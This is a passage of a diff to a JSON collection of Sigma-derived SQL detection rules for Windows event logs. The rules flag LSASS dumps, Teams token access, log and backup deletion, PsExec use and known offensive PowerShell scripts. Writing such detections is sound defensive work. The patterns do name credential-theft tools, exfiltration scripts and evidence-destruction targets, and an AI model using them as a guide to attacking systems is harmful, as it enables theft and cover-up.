"Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Remote Service Activity via SVCCTL Named Pipe", - "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "status": "test", - "description": "Detects remote service activity via remote access to the svcctl named pipe", - "author": "Samir Bousseaden", + "title": "Backup Files Deleted", + "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "status": "experimental", + "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitime usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" ], - "filename": "win_security_svcctl_remote_service.yml" + "filename": "file_delete_win_delete_backup_file.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "status": "experimental", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "title": "File Deleted Via Sysinternals SDelete", + "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitime usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "EventLog EVTX File Deleted", + "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate used of encrypted ZIP files" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" - }, - { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", - "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_delete_win_delete_event_log_files.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "title": "Tomcat WebServer Logs Deleted", + "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the tomcat server", + "During log rotation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_delete_win_delete_tomcat_logs.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "status": "experimental", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1137.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", - "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "Azure AD Health Monitoring Agent Registry Keys Access", - "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" - ], - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" - }, - { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unlikely" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Password Protected ZIP File Opened", - "id": "00ba9da1-b510-4f6b-b258-8d338836180f", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" ], - "filename": "win_security_susp_opened_encrypted_zip.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "DCERPC SMB Spoolss Named Pipe", - "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "title": "Installation of TeamViewer Desktop", + "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "status": "test", - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "author": "OTR (Open Threat Research)", + "description": "TeamViewer_Desktop.exe is create during install", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Domain Controllers acting as printer servers too? :)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\')" ], - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" + "filename": "file_event_win_install_teamviewer_desktop.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", + "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.discovery" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -798,3013 +733,3002 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE 